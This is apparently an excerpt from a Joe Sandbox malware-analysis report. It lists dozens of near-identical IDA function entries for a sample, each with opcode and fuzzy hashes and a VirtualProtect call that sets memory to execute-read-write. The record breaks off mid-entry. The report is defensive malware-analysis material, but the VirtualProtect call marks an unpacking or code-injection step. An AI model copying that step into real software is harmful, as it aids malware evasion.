                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: d8dd47f1f8f6d29029304bd3571b97d78ed37f7ea15542f81214fd2d6cb6517b
                                                                                                                        • Instruction ID: 16e97a4dc2b1b72941229be2b9302e60e6d9b11039a76407f9f1745cf537d380
                                                                                                                        • Opcode Fuzzy Hash: d8dd47f1f8f6d29029304bd3571b97d78ed37f7ea15542f81214fd2d6cb6517b
                                                                                                                        • Instruction Fuzzy Hash: 13D125A2C082649AF7208624EC447EB7A68EF51314F1440FED94DA62C1D6BE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 9a29111bdd617bf36b934546c4c89c15ad789a813333cfd5b2bd9c88ef55fba9
                                                                                                                        • Instruction ID: e00debdacd192d099ab58c28448140415868ac13b88858dbeb5059bbadf96c13
                                                                                                                        • Opcode Fuzzy Hash: 9a29111bdd617bf36b934546c4c89c15ad789a813333cfd5b2bd9c88ef55fba9
                                                                                                                        • Instruction Fuzzy Hash: EBD127A2D082649AF7208624DC44BEB7A69DB51310F1440FED94DA72C1D6BE1FC6CBA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: c973c8076e2ec20e1500df515ef5ce8f7e3f02c717afe02f686bf680397f98d1
                                                                                                                        • Instruction ID: 2b20349ff3622c334264f6a588594712d4e80cc894e6c7ba1984c525794e84a0
                                                                                                                        • Opcode Fuzzy Hash: c973c8076e2ec20e1500df515ef5ce8f7e3f02c717afe02f686bf680397f98d1
                                                                                                                        • Instruction Fuzzy Hash: 1BD134B2C082649AF7208624DC447EB7A69DF50314F0440FED98D662C1DABE5FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: d4b94b1edf620e75fcdf4d1daecaa1fdd83cbeab1cbb3806c3cf8b24fd04c183
                                                                                                                        • Instruction ID: 5bf602528398837073a20d5b518e155b67223abd0f1d5e59e04288b574140e96
                                                                                                                        • Opcode Fuzzy Hash: d4b94b1edf620e75fcdf4d1daecaa1fdd83cbeab1cbb3806c3cf8b24fd04c183
                                                                                                                        • Instruction Fuzzy Hash: 22D136A2D082649AF7208624DC447EB7A69DF51314F0440FED94D672C1DABE1FC6CBA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: c6cabd91fa77b4f7cb2f0afbcf9f08ffd83e48e901675271b9030fe6847668bf
                                                                                                                        • Instruction ID: cb57e4122a001d9a5aea0e5eb30d6428f4d9882cba75bea230fd897a336bee3d
                                                                                                                        • Opcode Fuzzy Hash: c6cabd91fa77b4f7cb2f0afbcf9f08ffd83e48e901675271b9030fe6847668bf
                                                                                                                        • Instruction Fuzzy Hash: E6D135A2D082649AF7208624DC447EB7A69DF51310F0440FED98D672C1DABE1FC6CBA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: c5aa534f724c0a8c924347ab72f71a43756768e995d9007230a018139a930da0
                                                                                                                        • Instruction ID: de9717e0791dd079f802cc80978fd1fc09d249abcbc8c2fa0664e0f4ee9ea232
                                                                                                                        • Opcode Fuzzy Hash: c5aa534f724c0a8c924347ab72f71a43756768e995d9007230a018139a930da0
                                                                                                                        • Instruction Fuzzy Hash: DCD136A2D082649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 6d8c275d99a29c13d98e9956aa79e6e28d4ca0fb23a5d38f81c72338007ea39f
                                                                                                                        • Instruction ID: 0aac46a3f7d70648d6f49242e283d0af4f9a7a282a53a1faa8e93d764a905c88
                                                                                                                        • Opcode Fuzzy Hash: 6d8c275d99a29c13d98e9956aa79e6e28d4ca0fb23a5d38f81c72338007ea39f
                                                                                                                        • Instruction Fuzzy Hash: 3FD126E2D082649AF7208624DC44BEB7A68DF51314F1440FED94DA62C1D6BE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 522f41798cca4e8217d8314f8d4b31a1fb35cd02f5402e6ed2d5148ca51ec446
                                                                                                                        • Instruction ID: c42c67ffbe9c770f0b4030029c86904fbf9cde12d90d93a0a162ff4bceb9b38a
                                                                                                                        • Opcode Fuzzy Hash: 522f41798cca4e8217d8314f8d4b31a1fb35cd02f5402e6ed2d5148ca51ec446
                                                                                                                        • Instruction Fuzzy Hash: 56D127E2C082649AF7208624EC447EB7A79EF51314F1440FED94DA62C1D6BE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 799cf96d208df78444660078e2104325f2ee3c4a420d3db674c8bcb6f4dc4c4c
                                                                                                                        • Instruction ID: 458d38c4ac4ac2e0a890c9bb8e4a9faea148a723fd4b00d52b4af6688bdf90c3
                                                                                                                        • Opcode Fuzzy Hash: 799cf96d208df78444660078e2104325f2ee3c4a420d3db674c8bcb6f4dc4c4c
                                                                                                                        • Instruction Fuzzy Hash: 4ED135E2D082649AF7208624EC447EB7A68EF51314F1440FED94DA62C1D6BE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: f008ab9c7c818f81744ee77cf2c6e55b4ec4b83fb5e804deb6bf64c9298d7c23
                                                                                                                        • Instruction ID: 59163a79f1e718bf8fdf548af5e6fdd436e52e4d132ed39006692e3f8e990f66
                                                                                                                        • Opcode Fuzzy Hash: f008ab9c7c818f81744ee77cf2c6e55b4ec4b83fb5e804deb6bf64c9298d7c23
                                                                                                                        • Instruction Fuzzy Hash: 36D147A2D042649AF7208624EC44BEB7A69DF51310F0440FED94DA72C1D6BE5FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 26fbc9ab7792db71d7a3ca395d2d03866270531154e9b2181aac9bc8d78f0471
                                                                                                                        • Instruction ID: 6c61b91d5ed829c07fb3eca1805c18e4c1d41d2c227a964cc652b6df1d4533f5
                                                                                                                        • Opcode Fuzzy Hash: 26fbc9ab7792db71d7a3ca395d2d03866270531154e9b2181aac9bc8d78f0471
                                                                                                                        • Instruction Fuzzy Hash: 51D135E2C082649AF7208624DC447EB7A69EF51314F1480FED94DA62C1D6BE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 736f7411ec79d40dddd1db38831dba188a81169fb3a5d6ffb08c0fc51e07d7d1
                                                                                                                        • Instruction ID: 283ebc008c54337029ad982e6338bed2757a0bab3e3c0bbaa6d50b25317a4fa5
                                                                                                                        • Opcode Fuzzy Hash: 736f7411ec79d40dddd1db38831dba188a81169fb3a5d6ffb08c0fc51e07d7d1
                                                                                                                        • Instruction Fuzzy Hash: C2D146B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA62C1DABE5FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 1ab454213d97a097068b25bdb4cb47c85771fadaecd6cb952ead88962a443a05
                                                                                                                        • Instruction ID: a52d7f9a2be6bdc38b4d8026e473589b155c0d63e94e31f5312e0c049a63bb1f
                                                                                                                        • Opcode Fuzzy Hash: 1ab454213d97a097068b25bdb4cb47c85771fadaecd6cb952ead88962a443a05
                                                                                                                        • Instruction Fuzzy Hash: C9D136A2D082649AF7208624DC44BEB7A69DF51314F0440FED94D672C1DABE1FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 07d21b7d3cc7c4c10eff04a9f666629b599e6123287b287356066a7a6680f988
                                                                                                                        • Instruction ID: 99fb7f812fc30dd67a8a23df3a2d064b4511fad256f5c479e17d888b49691586
                                                                                                                        • Opcode Fuzzy Hash: 07d21b7d3cc7c4c10eff04a9f666629b599e6123287b287356066a7a6680f988
                                                                                                                        • Instruction Fuzzy Hash: 8ED134A2D082649AF7208624DC447EB7A68DF51314F0440FED98DA72C1DABE5FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: f7584e4d2a8087fb65cfc1a0ca62cb735ae4cda63d473a9d9d38d3484e92d711
                                                                                                                        • Instruction ID: 2eb3e874b1c4aa01e51b347669719f9f5b5e43f5857c0d317553baf01cd7914e
                                                                                                                        • Opcode Fuzzy Hash: f7584e4d2a8087fb65cfc1a0ca62cb735ae4cda63d473a9d9d38d3484e92d711
                                                                                                                        • Instruction Fuzzy Hash: 47D136B2C042649AF7208624DC447EB7A69DF51314F1440FED98DA62C1DABE1FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 1be0917443ebbe20a96136dd23fbac885d9b2a13d24d572ba56184e524df3c9a
                                                                                                                        • Instruction ID: ca2380e374f470f38af7b9893bc6be273685a27750bc787c277f5f52459a791b
                                                                                                                        • Opcode Fuzzy Hash: 1be0917443ebbe20a96136dd23fbac885d9b2a13d24d572ba56184e524df3c9a
                                                                                                                        • Instruction Fuzzy Hash: 0BC136A2D082649AF7208624DC447EB7A69DF51314F0840FED98D672C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 4e182af6198bdb259ac28646dfb70ca7a0c84178e6bb25da822de0b004e48401
                                                                                                                        • Instruction ID: 785747cffc71ee2e623740ec2709f746bb4eecd73c091485c27e31070438e9fb
                                                                                                                        • Opcode Fuzzy Hash: 4e182af6198bdb259ac28646dfb70ca7a0c84178e6bb25da822de0b004e48401
                                                                                                                        • Instruction Fuzzy Hash: 63C135B2C042649AF7208624DC447EB7A69DF51314F1440FED98DA62C1DABE0FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 9131158bdcb16dd5779c4a55038fec9e1f5f0dfb7f8ae4d7e15de7015695186a
                                                                                                                        • Instruction ID: ea99530225736df8b548ebe2bae57b79cf499234a5dd8c7338e838a4a56707e2
                                                                                                                        • Opcode Fuzzy Hash: 9131158bdcb16dd5779c4a55038fec9e1f5f0dfb7f8ae4d7e15de7015695186a
                                                                                                                        • Instruction Fuzzy Hash: E5C135A2D082649AF7208624DC44BEB7A69DF51310F1440FED98D672C1DABE1FC68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: d3c42047d87a86d63d58d84b158be34b8d2acf367a4459959edbab65f2a6965e
                                                                                                                        • Instruction ID: d7193199d5c040545e3c9022d1fc5edff3b9aaee513072e49c1cd987f5022490
                                                                                                                        • Opcode Fuzzy Hash: d3c42047d87a86d63d58d84b158be34b8d2acf367a4459959edbab65f2a6965e
                                                                                                                        • Instruction Fuzzy Hash: 99C147A2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC5CBA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 62b09ee9c9c43222daf5d7d729e72fa8f280d2fcb39bed247f37f672a20773e2
                                                                                                                        • Instruction ID: 02ac1c241656fbca97fd14fc078b331ed1feb611b8351a98511c686d9a3b4722
                                                                                                                        • Opcode Fuzzy Hash: 62b09ee9c9c43222daf5d7d729e72fa8f280d2fcb39bed247f37f672a20773e2
                                                                                                                        • Instruction Fuzzy Hash: 6EC135B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE0FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 12615ee431bc97ba1e0813fb1d754cd120cf9c8348520ce4a5478a199e0d867e
                                                                                                                        • Instruction ID: c66bbedd050fd74ef394c8872448b7775fcb60110f28595935eee93ec1a4977d
                                                                                                                        • Opcode Fuzzy Hash: 12615ee431bc97ba1e0813fb1d754cd120cf9c8348520ce4a5478a199e0d867e
                                                                                                                        • Instruction Fuzzy Hash: 4CC125B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 77f6d390efb2074a9dcccaf55be6bcb51fde9afb9c1353f5910512e37f7c94ac
                                                                                                                        • Instruction ID: 27de90576a5a983c8bb595c6caf4dd849db3fb230b9d96bcbd17ce429aaee787
                                                                                                                        • Opcode Fuzzy Hash: 77f6d390efb2074a9dcccaf55be6bcb51fde9afb9c1353f5910512e37f7c94ac
                                                                                                                        • Instruction Fuzzy Hash: 54C125A2D082649AF7208624DC447EB7A69EF51310F1440FED98D672C1DABE1FC58BA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: e670bb2e270d01d68748bfc768d3d097a6a5e55323208fb8fa46f209319c35cb
                                                                                                                        • Instruction ID: 739206e10e5bbd3a87ea5bf69ee451f3fa2a1961f9d0f60c166b0e27f9f25d40
                                                                                                                        • Opcode Fuzzy Hash: e670bb2e270d01d68748bfc768d3d097a6a5e55323208fb8fa46f209319c35cb
                                                                                                                        • Instruction Fuzzy Hash: 72C136A2D082649AF7208624DC44BEB7A68DF51314F1440FED94DA72C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 39b22dd4791b86b672102f70ec30b4cce7713b9ba6efc1b3cdc1461827cba0ab
                                                                                                                        • Instruction ID: 3f89346d8a0091a78b3bd381845a04ed6bfbe6e677ca770093b5f7ced1ed0a00
                                                                                                                        • Opcode Fuzzy Hash: 39b22dd4791b86b672102f70ec30b4cce7713b9ba6efc1b3cdc1461827cba0ab
                                                                                                                        • Instruction Fuzzy Hash: 35C135B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: cf541e64226296dde0f04c1dae3208fa3a1819e8189e5f36ca0d2be6f11d627c
